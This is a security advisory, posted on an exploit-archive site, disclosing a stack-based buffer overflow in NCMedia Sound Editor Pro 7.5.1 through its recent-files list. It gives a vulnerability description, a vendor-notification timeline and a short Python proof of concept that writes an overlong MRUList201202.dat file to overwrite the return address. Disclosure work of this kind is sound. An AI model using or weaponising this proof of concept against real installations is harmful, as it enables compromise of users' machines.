exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NCMedia Sound Editor Pro 7.5.1 Buffer Overflow

NCMedia Sound Editor Pro 7.5.1 Buffer Overflow
Posted Sep 17, 2012
Authored by Julien Ahrens | Site security.inshell.net

A local buffer overflow vulnerability has been found on the NCMedia Sound Editor Pro version 7.5.1. The application saves the paths for all recently used files in a file called "MRUList201202.dat" in the directory %appdata%\Sound Editor Pro\. When clicking on the "File" menu item the application reads the contents of the file, but does not validate the length of the string loaded from the file before passing it to a buffer, which leads to a stack-based buffer overflow.

tags | exploit, overflow, local
SHA-256 | a1f0e2a2be8b3403de464902a0d925d7567541a522d8d12be77fb9410aac9104

NCMedia Sound Editor Pro 7.5.1 Buffer Overflow

Change Mirror Download
Inshell Security Advisory
http://www.inshell.net


1. ADVISORY INFORMATION
-----------------------
Product: Sound Editor Pro v7.5.1
Vendor URL: www.soundeditorpro.com
Type: Stack-based Buffer Overflow [CWE-121]
Date found: 2012-08-15
Date published: 2012-09-16
CVSSv2 Score: 6,9 (AV:L/AC:M/Au:N/C:C/I:C/A:C)
CVE: -


2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.


3. VERSIONS AFFECTED
--------------------
NCMedia Sound Editor Pro v7.5.1, older versions may be affected too.


4. VULNERABILITY DESCRIPTION
----------------------------
A Local Buffer Overflow Vulnerability has been found on the NCMedia
Sound Editor Pro v7.5.1.

The application saves the paths for all recently used files in a file
called "MRUList201202.dat" in the directory %appdata%\Sound Editor Pro\.
When clicking on the "File" menu item the application reads the contents
of the file, but does not validate the length of the string loaded from
the file before passing it to a buffer, which leads to a Stack-based
Buffer Overflow.

An attacker needs to force the victim to place an arbitrary
"MRUList201202.dat" file into the target directory.


5. PROOF-OF-CONCEPT (CODE / EXPLOIT)
------------------------------------
#!/usr/bin/python
file="MRUList201202.dat"

junk1="\x41" * 4124
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc=junk1 + boom + junk2

try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!"
except:
print "[!] Error while creating file!"


For further screenshots and/or PoCs visit:
http://security.inshell.net/advisory/38


6. SOLUTION
-----------
None


7. REPORT TIMELINE
------------------
2012-08-15: Initial notification sent to vendor
2012-08-22: No response, second notification sent to vendor
2012-08-29: No response, third notification sent to vendor
2012-09-16: No response
2012-09-16: Full Disclosure according to disclosure policy


8. REFERENCES
-------------
http://security.inshell.net
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close